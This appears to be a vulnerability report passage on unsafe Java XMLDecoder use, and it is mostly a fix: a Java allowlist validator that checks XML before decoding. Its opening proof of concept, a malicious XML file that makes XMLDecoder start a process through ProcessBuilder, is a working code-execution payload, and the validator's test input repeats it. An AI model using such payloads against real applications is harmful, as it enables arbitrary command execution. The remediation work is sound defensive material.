Open the software, select the Open option under File, and select the malicious XML file to trigger the vulnerability:
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="1" >
<void index="0">
<string>calc</string>
</void>
</array>
<void method="start"/>
</object>
</java>

Fix measures: do not use XMLDecoder to read files directly. Implement a validate function that checks and filters the InputStream object before XML decoding (XMLDecoder) is executed; the way WebLogic repaired this issue is a useful reference.
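One way to write the validate step described above, as an added example that is not part of the original report or the affected project's code. The class name `SafeXmlDecode`, the element allowlist and the sample inputs are assumptions made for illustration. Using an allowlist is a choice made here, not a description of the WebLogic patch. It needs Java 9 or later.

```java
import java.beans.XMLDecoder;
import java.io.ByteArrayInputStream;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.util.Set;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.Attributes;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

public class SafeXmlDecode {
    // Assumption: the application's files only carry plain values, so only these elements are needed.
    private static final Set<String> ALLOWED = Set.of("java", "string", "int", "long", "boolean", "double", "null");

    // Throws SAXException if any element or attribute falls outside the allowlist.
    static void validate(byte[] xml) throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Supported by the JDK's built-in parser: refuse DOCTYPE so entities cannot hide content.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.newSAXParser().parse(new ByteArrayInputStream(xml), new DefaultHandler() {
            @Override
            public void startElement(String uri, String local, String qName, Attributes a) throws SAXException {
                if (!ALLOWED.contains(qName)) throw new SAXException("element not allowed: <" + qName + ">");
                for (int i = 0; i < a.getLength(); i++) {
                    // class=, method=, property=, field= and idref= drive reflection: allow only the file header.
                    String n = a.getQName(i), v = a.getValue(i);
                    boolean header = qName.equals("java")
                            && (n.equals("version") || (n.equals("class") && v.equals("java.beans.XMLDecoder")));
                    if (!header) throw new SAXException("attribute not allowed: " + n + " on <" + qName + ">");
                }
            }
        });
    }

    static Object decode(InputStream in) throws Exception {
        byte[] xml = in.readAllBytes(); // buffer once so the validator and the decoder see identical bytes
        validate(xml);
        try (XMLDecoder d = new XMLDecoder(new ByteArrayInputStream(xml))) { return d.readObject(); }
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample inputs: a plain value, and a document that uses <object>/<void>.
        String ok = "<java version=\"1.8\" class=\"java.beans.XMLDecoder\"><string>hello</string></java>";
        String bad = "<java><object class=\"java.lang.ProcessBuilder\"><void method=\"start\"/></object></java>";
        System.out.println("decoded: " + decode(new ByteArrayInputStream(ok.getBytes(StandardCharsets.UTF_8))));
        try { decode(new ByteArrayInputStream(bad.getBytes(StandardCharsets.UTF_8))); }
        catch (SAXException e) { System.out.println("rejected: " + e.getMessage()); }
    }
}
```

The validator runs to completion before `XMLDecoder` is constructed, so a rejected document is never handed to the decoder at all.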